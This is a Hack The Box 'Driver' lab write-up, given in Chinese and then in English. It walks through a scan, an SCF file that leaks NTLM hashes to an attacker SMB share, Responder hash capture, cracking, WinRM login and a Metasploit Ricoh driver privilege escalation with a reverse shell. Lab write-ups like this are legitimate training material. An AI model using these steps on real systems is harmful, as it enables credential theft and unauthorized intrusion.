htb driver
Information Gathering
# Nmap 7.98 scan initiated Wed Dec 31 09:16:57 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.088s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Dec 31 09:15:55 2025)
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-12-31T15:47:04
|_ start_date: 2025-12-31T15:45:49
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h29m44s, deviation: 0s, median: 6h29m44s
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 09:17:57 2025 -- 1 IP address (1 host up) scanned in 60.06 secondsVulnerability Analysis
打开http://10.10.11.106/输入admin:admin就进入了,发现可以上传固件。加上smb服务开启
SCF NTLM 哈希捕获
Windows 系统有一个特性:如果一个文件夹里包含一个 .scf (Shell Command File) 文件,并且 Windows 资源管理器(或某种后台服务)尝试查看这个文件夹时,.scf 文件可以指示系统去加载一个“远程图标”。
攻击流程:
- 上传一个恶意的
.scf文件,里面写着“图标请去攻击者的机器上取”。 - 靶机后台服务在处理上传目录时,会尝试连接Kali。
- Windows 在连接 SMB 共享时,会默认发送当前用户的 NTLMv2 哈希 进行身份验证。
- 在 Kali 上用
Responder监听,就能截获这个哈希。 - 拿到哈希后,破解它,获得明文密码。
Exploitation (User Flag)
上传一个恶意的.csf程序,里面包含“图标请去攻击者的机器上取”。
➜ Driver nano @exploit.scf
➜ Driver cat @exploit.scf
[Shell]
Command=2
IconFile=\\10.10.16.3\share\test.ico
[Taskbar]
Command=ToggleDesktop启动监听上传文件
➜ Driver sudo responder -I tun0
[SMB] NTLMv2-SSP Hash : tony::DRIVER:9df54339562d9c7c:9D14D9809E6DB7E0A35B2866A418F660:0101000000000000002E498F377ADC01C085F55086ACD0BF0000000002000800440044004200320001001E00570049004E002D004C004C00320054004C00480056004C004C005800370004003400570049004E002D004C004C00320054004C00480056004C004C00580037002E0044004400420032002E004C004F00430041004C000300140044004400420032002E004C004F00430041004C000500140044004400420032002E004C004F00430041004C0007000800002E498F377ADC010600040002000000080030003000000000000000000000000020000021B774E55D153D08289FB802C0AFD1AB67A81BF61B6A4381AE931D3BBB07E3BE0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003300000000000000000000000000破解密码得到tony:liltony
➜ Driver evil-winrm -i 10.10.11.106 -u tony -p 'liltony'Privilege Escalation (Root Flag)
我们尝试连接到msfconsole
meterpreter > ps
2848 840 taskhostw.exe x64 1 DRIVER\tony C:\Windows\System32\taskhostw.exe
meterpreter > migrate 2848 # migrate 到1的可以交互的地方
[*] Migrating from 5036 to 2848...
[*] Migration completed successfully.
msf exploit(multi/handler) > use multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
run[*] 10.10.11.106 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
4 exploit/windows/local/bypassuac_fodhelper Yes The target appears to be vulnerable.
......鉴于80端口运行的是打印机服务,所以我们可以尝试相关的漏洞
我们查看一下powershell的历史命令
C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\tony> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'
ping 1.1.1.1
ping 1.1.1.1所以使用
15 exploit/windows/local/ricoh_driver_privesc Yes The target appears to be vulnerable. Ricoh driver directory has full permissionsmsf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf exploit(windows/local/ricoh_driver_privesc) > set lhost tun0
lhost => 10.10.16.3
msf exploit(windows/local/ricoh_driver_privesc) > runLessons Learned
htb Driver
Information Gathering
# Nmap 7.98 scan initiated on Wednesday, December 31, 2025, at 09:16:57, with the following command:
`/usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.106`
**Nmap scan report for 10.10.11.106:**
The host is online (latency: 0.088 seconds).
**996 TCP ports were not shown due to no response.**
| PORT | STATE | SERVICE | VERSION |
|---------|---------|------------|-----------------|
| 80/tcp | open | http | Microsoft IIS httpd 10.0 |
| | | _http-title: The site does not have a title (format: text/html; charset: UTF-8). |
| | | http-methods: | OPTIONS, TRACE, GET, HEAD, POST |
| | | _Potentially risky method: TRACE |
| | | _http-server-header: Microsoft-IIS/10.0 |
| 135/tcp | open | msrpc | Microsoft Windows RPC |
| 445/tcp | open | microsoft-ds | Microsoft Windows 7–10 |
| 5985/tcp | open | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
| | | _http-server-header: Microsoft-HTTPAPI/2.0 |
| | | _http-title: Not found |
**Warning:** The results from OSScan may be unreliable because at least one open port and one closed port could not be detected.
**Possible operating systems:**
Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 11 (86%),
Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%),
Microsoft Windows Vista or Windows 7 (86%),
Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%),
Microsoft Windows Server 2016 (85%).
**Uptime estimate:** 0.001 days (since Wednesday, December 31, 2025, 09:15:55).
**TCP sequence prediction difficulty:** 258 (Difficult).
**IP address sequence generation:** Incremental.
**Service information:**
Host: DRIVER; Operating system: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| Version: 3.1.1
|_ Message signing is enabled but not required
| smb2-time:
| Date: 2025-12-31T15:47:04
|_ Start time: 2025-12-31T15:45:49
| smb-security-mode:
| Used account: guest
| Authentication level: user
| Challenge response: Supported
|_ Message signing: Disabled (dangerous, but this is the default setting)
|_ Clock skew: Mean: 6h29m44s; Deviation: 0s; Median: 6h29m44s
Data files were read from: /usr/share/nmap
OS and service detection was performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap results: Scanning completed on Wednesday, December 31, 2025, at 09:17:57 AM – 1 IP address (1 host up) was scanned in 60.06 seconds.Vulnerability Analysis
By accessing http://10.10.11.106/ and using the username “admin” and password “admin”, it was discovered that firmware can be uploaded to the system, and the SMB service is also enabled.
SCF NTLM Hash Capture
Windows has a feature where if a folder contains a .scf (Shell Command File) file, and Windows Explorer (or a background service) attempts to view the folder, the .scf file can instruct the system to load a “remote icon”.
Attack Process:
- A malicious
.scffile is uploaded, which contains a message stating that the icon should be obtained from the attacker’s machine. - The target system’s background service attempts to connect to Kali while processing the uploaded file.
- When Windows connects to the SMB share, it automatically sends the current user’s NTLMv2 hash for authentication.
- On Kali, the
Respondertool is used to intercept this hash. - Once the hash is obtained, it is cracked to reveal the plaintext password.
Exploitation (User Flag)
A malicious .scf file is uploaded, containing the instruction to obtain the icon from the attacker’s machine:
➜ driver nano @exploit.scf
➜ driver cat @exploit.scf
[Shell]
Command=2
IconFile=\\10.10.16.3\share\test.ico
[Taskbar]
Command=ToggleDesktopTo start listening for uploaded files:
➜ driver sudo responder -I tun0
[SMB] NTLMv2-SSP Hash : tony::DRIVER:9df54339562d9c7c:9D14D9809E6DB7E0A35B2866A418F660:01010000000000000002E498F377ADC01C085F55086ACD0BF0000000002000800440044004200320001001E00570049004E002D004C004C00320054004C00480056004C004C00580037002E0044004400420032002E004C004F00430041004C00030014004400420032002E004C004F00430041004C00050014004400420032002E004C004F00430041004C0007000800002E498F377ADC01060004000200000000000000000000000000000000020000021B774E55D153D08289FB802C0AFD1AB67A81BF61B6A4381AE931D3BBB07E3BE0A001000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003300000000000000000000000000The password tony:liltony was cracked using this method:
➜ driver evil-winrm -i 10.10.11.106 -u tony -p 'liltony'Privilege Escalation (Root Access)
We attempt to connect to msfconsole:
meterpreter > ps
2848 840 taskhostw.exe x64 1 DRIVER\tony C:\Windows\System32\taskhostw.exe
meterpreter > migrate 2848 # Migrate to the interactive session 1
[*] Migrating from 5036 to 2848...
[*] Migration completed successfully.
msf exploit(multi/handler) > use multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
run[*] 10.10.11.106 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
4 exploit/windows/local/bypassuac_fodhelper Yes The target appears to be vulnerable.
......Since port 80 is running a printer service, we can attempt to exploit related vulnerabilities.
We check the PowerShell history commands:
C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\tony> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'
ping 1.1.1.1
ping 1.1.1.1Therefore, we use the following exploit:
15 exploit/windows/local/ricoh_driver_privesc Yes The target appears to be vulnerable. The Ricoh driver directory has full permissions.msf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf exploit(windows/local/ricoh_driver_privesc) > set lhost tun0
lhost => 10.10.16.3
msf exploit(windows/local/ricoh_driver_privesc) > run